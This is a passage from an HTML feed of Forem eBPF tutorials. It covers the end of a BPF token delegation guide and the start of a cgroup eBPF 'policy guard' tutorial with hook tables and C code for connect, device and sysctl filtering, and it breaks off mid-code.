&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_token
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the end-to-end demo:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./token_userns_demo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;token path     : /proc/self/fd/5
interface      : lo (ifindex=1)
packets before : 0
packets after  : 1
delta          : 1
last ifindex   : 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;delta: 1&lt;/code&gt; confirms that the XDP program was successfully loaded and attached using a BPF token, with no &lt;code&gt;CAP_BPF&lt;/code&gt; or &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the child process.&lt;/p&gt;

&lt;p&gt;Add &lt;code&gt;-v&lt;/code&gt; for verbose libbpf output to see the token being created and used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./token_userns_demo &lt;span class="nt"&gt;-v&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you already manage your own delegated bpffs in a user namespace, you can run the loader directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./token_trace &lt;span class="nt"&gt;-t&lt;/span&gt; /proc/self/fd/&amp;lt;mnt-fd&amp;gt; &lt;span class="nt"&gt;-i&lt;/span&gt; lo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Real-World Applications
&lt;/h2&gt;

&lt;p&gt;While this tutorial uses a minimal XDP program, the BPF token pattern scales to production scenarios:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Container runtimes&lt;/strong&gt; (LXD, Docker, Kubernetes): Mount a delegated bpffs into a container with only the program and map types the workload needs. LXD already supports this through its &lt;code&gt;security.delegate_bpf&lt;/code&gt; option.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CI/CD testing&lt;/strong&gt;: Give build jobs the ability to load and test specific eBPF programs without granting them host-level capabilities. The delegation policy acts as an allowlist for BPF operations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multi-tenant BPF platforms&lt;/strong&gt;: A platform daemon creates per-tenant bpffs mounts with different delegation policies. One tenant might be allowed XDP + array maps, while another might get tracepoint + ringbuf access.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LSM integration&lt;/strong&gt;: Because BPF tokens integrate with Linux Security Modules, you can combine token delegation with SELinux or AppArmor policies for defense-in-depth. Each token gets its own security context that LSM hooks can inspect.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;In this tutorial, we learned how BPF token provides a delegation model for eBPF privilege that goes beyond the binary "all or nothing" of Linux capabilities. We walked through the complete flow: a privileged parent configures a bpffs instance with specific delegation options, an unprivileged child in a user namespace derives a token from that bpffs, and libbpf transparently uses the token for map creation, program loading, and attachment. The result is a minimal XDP program running in an unprivileged context, something that was impossible before Linux 6.9.&lt;/p&gt;

&lt;p&gt;BPF token is not a niche feature. It represents the kernel's answer to a fundamental question in the eBPF ecosystem: how do you safely share BPF capabilities in a multi-tenant world without granting unconstrained access to the BPF subsystem?&lt;/p&gt;

&lt;p&gt;If you'd like to learn more about eBPF, visit our tutorial code repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or website &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt; for more examples and complete tutorials.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.ebpf.io/linux/concepts/token/" rel="noopener noreferrer"&gt;BPF Token concept documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lore.kernel.org/bpf/20240103222034.2582628-1-andrii@kernel.org/T/" rel="noopener noreferrer"&gt;BPF token kernel patch series (Andrii Nakryiko)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lwn.net/Articles/959350/" rel="noopener noreferrer"&gt;BPF token LWN article&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lwn.net/Articles/947173/" rel="noopener noreferrer"&gt;Finer-grained BPF tokens LWN discussion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://documentation.ubuntu.com/lxd/latest/explanation/bpf/" rel="noopener noreferrer"&gt;Privilege delegation using BPF Token (LXD documentation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.ebpf.io/ebpf-library/libbpf/userspace/bpf_token_create/" rel="noopener noreferrer"&gt;bpf_token_create() libbpf API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.kernel.org/bpf/" rel="noopener noreferrer"&gt;https://docs.kernel.org/bpf/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>tutorial</category>
      <category>linux</category>
    </item>
    <item>
      <title>eBPF Tutorial: cgroup-based Policy Control</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 24 Feb 2026 07:43:56 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-cgroup-based-policy-control-1k2d</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-cgroup-based-policy-control-1k2d</guid>
      <description>&lt;p&gt;Do you need to enforce network access control on containers or specific process groups without affecting the entire system? Or do you need to restrict certain processes from accessing specific devices while allowing others to use them normally? Traditional iptables and device permissions are global, making fine-grained per-process-group control impossible.&lt;/p&gt;

&lt;p&gt;This is the problem &lt;strong&gt;cgroup eBPF&lt;/strong&gt; solves. By attaching eBPF programs to cgroups (control groups), you can implement policy control based on process membership—only processes belonging to a specific cgroup are affected. This enables container isolation, multi-tenant security, and sandbox environments. In this tutorial, we'll build a complete "policy guard" program that demonstrates TCP connection filtering, device access control, and sysctl read restrictions—three types of cgroup eBPF usage.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is cgroup eBPF?
&lt;/h2&gt;

&lt;p&gt;The core idea of cgroup eBPF is simple: attach an eBPF program to a cgroup, and all processes in that cgroup will be controlled by this program. Unlike XDP/tc which filter traffic by network interface, cgroup eBPF filters by process membership—put a container in a cgroup, attach a policy program, and that container's network access, device access, and sysctl reads/writes are all under your control. Processes in other cgroups are completely unaffected.&lt;/p&gt;

&lt;p&gt;This model is perfect for container and multi-tenant scenarios. Kubernetes NetworkPolicy uses cgroup eBPF under the hood. You can also use it for device isolation (e.g., restricting which containers can access GPUs), security sandboxes (preventing reads of sensitive sysctls), and more. When a cgroup eBPF program denies an operation, userspace syscalls return &lt;code&gt;EPERM&lt;/code&gt; (Operation not permitted).&lt;/p&gt;

&lt;h2&gt;
  
  
  cgroup eBPF Hook Points
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. &lt;code&gt;BPF_PROG_TYPE_CGROUP_SOCK_ADDR&lt;/code&gt; - Socket Address Hooks
&lt;/h3&gt;

&lt;p&gt;Triggered on socket address syscalls (bind/connect/sendmsg/recvmsg):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;IPv4 bind&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/bind4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter bind() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv6 bind&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/bind6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter bind() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv4 connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter connect() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv6 connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter connect() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UDP sendmsg&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgroup/sendmsg4&lt;/code&gt;, &lt;code&gt;cgroup/sendmsg6&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Filter UDP sends&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UDP recvmsg&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgroup/recvmsg4&lt;/code&gt;, &lt;code&gt;cgroup/recvmsg6&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Filter UDP receives&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unix connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect_unix&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter Unix socket connect&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_sock_addr&lt;/code&gt; - contains &lt;code&gt;user_ip4&lt;/code&gt;, &lt;code&gt;user_port&lt;/code&gt; (network byte order)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 1&lt;/code&gt; = allow, &lt;code&gt;return 0&lt;/code&gt; = deny (EPERM)&lt;/p&gt;

&lt;h3&gt;
  
  
  2. &lt;code&gt;BPF_PROG_TYPE_CGROUP_DEVICE&lt;/code&gt; - Device Access Control
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Device access&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/dev&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter device open/read/write/mknod&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_cgroup_dev_ctx&lt;/code&gt; - contains &lt;code&gt;major&lt;/code&gt;, &lt;code&gt;minor&lt;/code&gt;, &lt;code&gt;access_type&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 0&lt;/code&gt; = deny (EPERM), non-zero = allow&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;code&gt;BPF_PROG_TYPE_CGROUP_SYSCTL&lt;/code&gt; - Sysctl Access Control
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sysctl access&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/sysctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter /proc/sys reads/writes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_sysctl&lt;/code&gt; - use &lt;code&gt;bpf_sysctl_get_name()&lt;/code&gt; to get sysctl name&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 0&lt;/code&gt; = reject (EPERM), &lt;code&gt;return 1&lt;/code&gt; = proceed&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Other cgroup Hooks
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cgroup_skb/ingress&lt;/code&gt;, &lt;code&gt;cgroup_skb/egress&lt;/code&gt; - Packet-level filtering&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cgroup/getsockopt&lt;/code&gt;, &lt;code&gt;cgroup/setsockopt&lt;/code&gt; - Socket option filtering&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cgroup/sock_create&lt;/code&gt;, &lt;code&gt;cgroup/sock_release&lt;/code&gt; - Socket lifecycle&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sockops&lt;/code&gt; - TCP-level optimization (attached via &lt;code&gt;BPF_CGROUP_SOCK_OPS&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  This Tutorial: cgroup Policy Guard
&lt;/h2&gt;

&lt;p&gt;We implement a single eBPF object with three programs:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Network (TCP)&lt;/strong&gt;: Block &lt;code&gt;connect()&lt;/code&gt; to a specified destination port&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Device&lt;/strong&gt;: Block access to a specified &lt;code&gt;major:minor&lt;/code&gt; device&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sysctl&lt;/strong&gt;: Block reading a specified sysctl (read-only, safer for testing)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Events are sent to userspace via ringbuf for observability.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Shared Header: cgroup_guard.h
&lt;/h3&gt;

&lt;p&gt;This header defines data structures shared between kernel and userspace:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cp"&gt;#ifndef __CGROUP_GUARD_H
#define __CGROUP_GUARD_H
&lt;/span&gt;
&lt;span class="cp"&gt;#ifndef TASK_COMM_LEN
#define TASK_COMM_LEN 16
#endif
&lt;/span&gt;
&lt;span class="cp"&gt;#define SYSCTL_NAME_LEN 64
&lt;/span&gt;
&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;event_type&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;ts_ns&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;TASK_COMM_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="k"&gt;union&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* IPv4, network order */&lt;/span&gt;
            &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
            &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;proto&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* e.g. 6 for TCP */&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cp"&gt;#endif &lt;/span&gt;&lt;span class="cm"&gt;/* __CGROUP_GUARD_H */&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;event&lt;/code&gt; structure uses a union to store type-specific data for different events, saving space while maintaining a unified event format.&lt;/p&gt;

&lt;h3&gt;
  
  
  eBPF Program: cgroup_guard.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cm"&gt;/* cgroup_guard.bpf.c - cgroup eBPF policy guard
 *
 * This program demonstrates three types of cgroup eBPF hooks:
 * 1. cgroup/connect4 - TCP connection filtering
 * 2. cgroup/dev - Device access control
 * 3. cgroup/sysctl - Sysctl read/write control
 */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"vmlinux.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_endian.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;LICENSE&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"Dual BSD/GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== Configurable options: set by userspace before load ===== */&lt;/span&gt;
&lt;span class="cp"&gt;#define IPPROTO_TCP 6
&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;blocked_tcp_dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;                   &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_major&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;blocked_dev_minor&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;denied_sysctl_name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{};&lt;/span&gt; &lt;span class="cm"&gt;/* NUL-terminated */&lt;/span&gt;

&lt;span class="cm"&gt;/* ===== ringbuf: send denied events to userspace ===== */&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_RINGBUF&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* 16MB */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;events&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;__always_inline&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;fill_common&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ts_ns&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ktime_get_ns&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;__u32&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;bpf_get_current_comm&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Compare two strings, return 1 if equal, 0 if not
 * Note: b is volatile to handle const volatile rodata arrays correctly */&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;__always_inline&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;str_eq&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;max_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#pragma unroll
